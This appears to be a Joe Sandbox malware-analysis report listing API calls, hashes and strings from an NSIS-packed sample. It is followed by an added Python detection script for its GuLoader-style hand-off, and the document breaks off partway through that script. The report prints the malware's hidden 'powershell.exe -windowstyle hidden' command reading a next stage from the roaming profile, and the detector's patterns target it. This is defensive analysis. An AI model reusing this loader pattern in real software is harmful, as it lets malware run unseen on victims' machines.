                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                      • String ID:
                                                      • API String ID: 2547128583-0
                                                      • Opcode ID: ecfc0d1632056c4e1693efd0f98aabdfe4a2c93a6abc515f3d9591ad468ff55d
                                                      • Instruction ID: b294046d3e4dddd9dd595f306a5883e4a37f4b9faaa0bea25d2c73fe5553ab8f
                                                      • Opcode Fuzzy Hash: ecfc0d1632056c4e1693efd0f98aabdfe4a2c93a6abc515f3d9591ad468ff55d
                                                      • Instruction Fuzzy Hash: DFE08636704610AAD610BA709E48C6773A89F86710302C83FF546F6140D738DC32AA79
                                                      Uniqueness
                                                      • Uniqueness Score: -1.00%
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(00000003,00403118,00437800,80000000,00000003), ref: 00406176
                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406198
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: File$AttributesCreate
                                                      • String ID:
                                                      • API String ID: 415043291-0
                                                      • Opcode ID: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
                                                      • Instruction ID: be52236ca1bfc2e7009fe271a1dfd41440a2a0d1ebc26b2cb4c8630358080456
                                                      • Opcode Fuzzy Hash: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
                                                      • Instruction Fuzzy Hash: 30D09E31254301EFFF098F20DE16F2EBAA2EB94B00F11952CB682941E0DA715819DB15
                                                      Uniqueness
                                                      • Uniqueness Score: -1.00%
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(?,?,00405D52,?,?,00000000,00405F28,?,?,?,?), ref: 00406152
                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406166
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                      • Instruction ID: c2cf34f9040e51e437c363cb0e130cc408ba31f940be0e29863539f2f5e5855d
                                                      • Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                      • Instruction Fuzzy Hash: 34D0C976504220AFC2102728AE0889BBB55DB552717028A35F8A9A22B0CB314C6A8694
                                                      Uniqueness
                                                      • Uniqueness Score: -1.00%
                                                      APIs
                                                      • CreateDirectoryW.KERNELBASE(?,00000000,00403638,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405C36
                                                      • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405C44
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: CreateDirectoryErrorLast
                                                      • String ID:
                                                      • API String ID: 1375471231-0
                                                      • Opcode ID: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
                                                      • Instruction ID: 9ee767d7bb24d12ef4013e29ffdbd8bf560f6e5ed3fd997729cc5c4a92c9c995
                                                      • Opcode Fuzzy Hash: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
                                                      • Instruction Fuzzy Hash: 4EC08C30208601DAEA040B30DE08F073A50BB00340F214439A082E40A4CA308004CD2D
                                                      Uniqueness
                                                      • Uniqueness Score: -1.00%
                                                      APIs
                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023EE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfileStringWrite
                                                      • String ID:
                                                      • API String ID: 390214022-0
                                                      • Opcode ID: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
                                                      • Instruction ID: 95154b02373db31601182c66ccc42c3a1d246cd64da090b0d32e859a1de181fa
                                                      • Opcode Fuzzy Hash: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
                                                      • Instruction Fuzzy Hash: 7DE04F31900524BADB5036B15ECDDBE20685FC8318B14063FFA12B61C2D9FC0C43466D
                                                      Uniqueness
                                                      • Uniqueness Score: -1.00%
                                                      APIs
                                                      • WriteFile.KERNELBASE(00008001,00000000,00000000,00000000,00000000,004106EB,0040CEF0,0040357E,0040CEF0,004106EB,00414EF0,00004000,?,00000000,004033A8,00000004), ref: 00406238
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: FileWrite
                                                      • String ID:
                                                      • API String ID: 3934441357-0
                                                      • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                      • Instruction ID: 6296e445ee025582091cb162a3efd7a4c9b40fecddc6e186669f82422f4bfe72
                                                      • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                      • Instruction Fuzzy Hash: 00E08C3221021AABDF10AE548C00EEB3B6CEB013A0F02447AFD16E3050D231E83097A9
                                                      Uniqueness
                                                      • Uniqueness Score: -1.00%
                                                      APIs
                                                      • ReadFile.KERNELBASE(00008001,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,004035FA,00008001,00008001,004034FE,00414EF0,00004000,?,00000000,004033A8), ref: 00406209
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                      • Instruction ID: f029eba0d3a9f8ebddca737992f63761e7b4746d0aa70cfc26448402395c61e3
                                                      • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                      • Instruction Fuzzy Hash: 5DE08632154119EBCF106E908C00EEB379CEF15350F014876F921E7440D230E8328FA4
                                                      Uniqueness
                                                      • Uniqueness Score: -1.00%
                                                      APIs
                                                      • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040242A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfileString
                                                      • String ID:
                                                      • API String ID: 1096422788-0
                                                      • Opcode ID: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
                                                      • Instruction ID: 816608b18dc0c520cd9a71caba4f9b5dbdb35d60be0fcf423de44464aa3a4457
                                                      • Opcode Fuzzy Hash: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
                                                      • Instruction Fuzzy Hash: 95E04F31800229BEDB00EFA0CD09DAD3678AF40304F00093EF510BB0D1E7FC49519749
                                                      Uniqueness
                                                      • Uniqueness Score: -1.00%
                                                      APIs
                                                      • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,0040657D,?,?,?,?,: Completed,?,00000000), ref: 00406513
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: Open
                                                      • String ID:
                                                      • API String ID: 71445658-0
                                                      • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                      • Instruction ID: 600eba3f25fec8fd2e0e76c9bf818d2d921b30b98e1649e5cb913c6f6c6f8cb9
                                                      • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                      • Instruction Fuzzy Hash: 4DD0123600020DBBDF115E90ED01FAB3B5DAB08714F014826FE06A4091D775D530AB59
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040465F
Memory Dump Source
• Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: bbff93e8e7b6fbbde5b3e6835961aabe87c2407351212feb15be82645ba7347e
• Instruction ID: 8da91bbb186c2144be8ade9eda525c6e960391099661206c99069da2b113483a
• Opcode Fuzzy Hash: bbff93e8e7b6fbbde5b3e6835961aabe87c2407351212feb15be82645ba7347e
• Instruction Fuzzy Hash: 8AC04C717402007BDA209B609E49F0777545790740F1448397241E50E0DA75E450DA1C
Uniqueness
Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(00000028,?,00000001,00404461), ref: 00404644
Memory Dump Source
• Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 7b4bfb7d8a9e2d5081e5309f0fc6290f036d11fbecd93854b33ee848cd02fe6a
• Instruction ID: d5eb2a856a333d3101ae379727e71f2b9456d74e3cdd14bb02a2274a242f0d94
• Opcode Fuzzy Hash: 7b4bfb7d8a9e2d5081e5309f0fc6290f036d11fbecd93854b33ee848cd02fe6a
• Instruction Fuzzy Hash: 7DB09235280640AADE215B00DE09F867B66A7A4701F008438B240640B0CAB204A1DB08
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FB,?), ref: 0040360B
Memory Dump Source
• Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
• Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
• Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
• Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
Uniqueness
Uniqueness Score: -1.00%

APIs
• KiUserCallbackDispatcher.NTDLL(?,004043FA), ref: 0040462D
Memory Dump Source
• Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
• Opcode ID: a1d13c5b68b43feb2506ad2660f88dc7f5461ef8ac70b9f67d62976f64309ddb
• Instruction ID: 1e4f5f38d13ad7c97f33cdc532a4b6885827051f8054e7174c13f2a159251e9b
• Opcode Fuzzy Hash: a1d13c5b68b43feb2506ad2660f88dc7f5461ef8ac70b9f67d62976f64309ddb
• Instruction Fuzzy Hash: 7FA00176544900ABCA16AB50EF0980ABB72BBA8701B5288B9A285610348BB25821FB19
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00405707: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
  • Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
  • Part of subcall function 00405707: lstrcatW.KERNEL32(Completed,004030AD), ref: 00405762
  • Part of subcall function 00405707: SetWindowTextW.USER32(Completed,Completed), ref: 00405774
  • Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
  • Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
  • Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2
  • Part of subcall function 00405C65: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405C8E
  • Part of subcall function 00405C65: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405C9B
• CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FF0
  • Part of subcall function 00406B21: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406B32
  • Part of subcall function 00406B21: GetExitCodeProcess.KERNEL32(?,?), ref: 00406B54
  • Part of subcall function 004065C9: wsprintfW.USER32 ref: 004065D6
Memory Dump Source
• Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
Similarity
• API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
• String ID:
• API String ID: 2972824698-0
• Opcode ID: 26d50f179d8fc8cde647217e16b8c843d809a43f18d9577a6fed63db6197872c
• Instruction ID: ba3ed7a1875ec382e1b93905bcfefb33a8222a1057eccf936486356e32fab672
• Opcode Fuzzy Hash: 26d50f179d8fc8cde647217e16b8c843d809a43f18d9577a6fed63db6197872c
• Instruction Fuzzy Hash: 48F06D32905125EBDB20BBE599C59DE76F59B00318F25413FE102B21E1CB7C4E459A6E
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetDlgItem.USER32(?,000003FB), ref: 00404B41
• SetWindowTextW.USER32(00000000,?), ref: 00404B6B
• SHBrowseForFolderW.SHELL32(?), ref: 00404C1C
• CoTaskMemFree.OLE32(00000000), ref: 00404C27
• lstrcmpiW.KERNEL32(: Completed,00422F48,00000000,?,?), ref: 00404C59
• lstrcatW.KERNEL32(?,: Completed), ref: 00404C65
• SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404C77
  • Part of subcall function 00405CC6: GetDlgItemTextW.USER32(?,?,00000400,00404CAE), ref: 00405CD9
  • Part of subcall function 00406930: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00406993
  • Part of subcall function 00406930: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069A2
  • Part of subcall function 00406930: CharNextW.USER32(?,"C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069A7
  • Part of subcall function 00406930: CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069BA
• GetDiskFreeSpaceW.KERNEL32(00420F18,?,?,0000040F,?,00420F18,00420F18,?,00000001,00420F18,?,?,000003FB,?), ref: 00404D3A
• MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D55
  • Part of subcall function 00404EAE: lstrlenW.KERNEL32(00422F48,00422F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F4F
  • Part of subcall function 00404EAE: wsprintfW.USER32 ref: 00404F58
  • Part of subcall function 00404EAE: SetDlgItemTextW.USER32(?,00422F48), ref: 00404F6B
Strings
• H/B, xrefs: 00404BEF
• "powershell.exe" -windowstyle hidden "$Respireredes=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Gl, xrefs: 00404B0B
• m, xrefs: 00404AF8
• : Completed, xrefs: 00404C53, 00404C58, 00404C63
• C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238, xrefs: 00404C42
• A, xrefs: 00404C15
Memory Dump Source
• Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
Similarity
• API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
• String ID: "powershell.exe" -windowstyle hidden "$Respireredes=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Gl$: Completed$A$C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238$H/B$m
• API String ID: 2624150263-3641959131
• Opcode ID: 4cf00c73115f53cf57be461a99467e832b164710fce0f00c931b90381e9749c6
• Instruction ID: 96009b05525636a0bc85a96efb184481c484ec56fefee2337862baa2afa4bf02
• Opcode Fuzzy Hash: 4cf00c73115f53cf57be461a99467e832b164710fce0f00c931b90381e9749c6
• Instruction Fuzzy Hash: DDA173B1900209ABDB11AFA5CD45AEFB7B8EF84314F11843BF601B62D1D77C99418B6D
Uniqueness
Uniqueness Score: -1.00%
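
The string at xref 00404B0B in the function above is the installer stub's hand-off to its next stage: powershell.exe is started with -windowstyle hidden and the script begins by reading a file under C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238 with Get-Content (the file name is cut off in the report string). A process launched from a user-writable folder spawning hidden PowerShell that loads its code from the roaming profile is the behaviour behind the "Suspicious powershell command line found" and "Found suspicious powershell code related to unpacking" signatures, and the CreateProcessW call at 00405C8E is where the child is started. As an added example that is not part of the Joe Sandbox report, the following Python turns that observation into a detection over process-creation events. Field names follow Sysmon Event ID 1 (an assumption), the sample events are constructed here, and the payload file name in the first event is a placeholder because the real name is truncated on the page.

```python
"""Flag process-creation events that match the GuLoader NSIS-to-PowerShell
hand-off seen in this report: an executable in a user-writable folder starts
powershell.exe with a hidden window and reads its next stage from a file under
the roaming profile. Field names mirror Sysmon Event ID 1 (assumption)."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent_image: str   # full path of the parent process
    image: str          # full path of the created process
    command_line: str   # raw command line of the created process


# -w / -win / -windowstyle followed by hidden. PowerShell accepts abbreviated
# parameter names such as -w, so both tokens are matched as loose prefixes.
HIDDEN_WINDOW = re.compile(r"-w[indowstyle]*\s+h[idden]*\b", re.IGNORECASE)

# Get-Content (or an alias) reading a file under the roaming profile, as in
# the string at 00404B0B. Either a literal \AppData\Roaming\ path or $env:APPDATA.
GET_CONTENT_ROAMING = re.compile(
    r"""(?:Get-Content|\bgc\b|\bcat\b|\btype\b)\s+['"]?[^'"]*?"""
    r"""(?:\\AppData\\Roaming\\|\$env:APPDATA)""",
    re.IGNORECASE,
)

# Parent executable living where a user (or an e-mail attachment) can write.
USER_WRITABLE_PARENT = re.compile(
    r"\\(?:Users\\[^\\]+\\(?:Desktop|Downloads)|AppData\\Local\\Temp)\\",
    re.IGNORECASE,
)


def is_powershell(image: str) -> bool:
    """True for powershell.exe / pwsh.exe regardless of directory or case."""
    return image.lower().rsplit("\\", 1)[-1] in ("powershell.exe", "pwsh.exe")


def score_event(ev: ProcEvent) -> list:
    """Return the names of the indicators that fire on one event (empty = none)."""
    hits = []
    if not is_powershell(ev.image):
        return hits
    if HIDDEN_WINDOW.search(ev.command_line):
        hits.append("hidden_window")
    if GET_CONTENT_ROAMING.search(ev.command_line):
        hits.append("get_content_appdata_roaming")
    if USER_WRITABLE_PARENT.search(ev.parent_image):
        hits.append("parent_in_user_writable_dir")
    return hits


def detect(events, min_hits: int = 2) -> list:
    """Return (event, hits) pairs for events with at least min_hits indicators.
    A single indicator is common in legitimate automation; two together are not."""
    flagged = []
    for ev in events:
        hits = score_event(ev)
        if len(hits) >= min_hits:
            flagged.append((ev, hits))
    return flagged


# Constructed sample events. Event 0 reproduces the command line from this
# report; the file name after Depravingly238\ is truncated on the page, so
# "payload.dat" is a placeholder, not the real name.
SAMPLE_EVENTS = [
    ProcEvent(
        parent_image=r"C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe",
        image=r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
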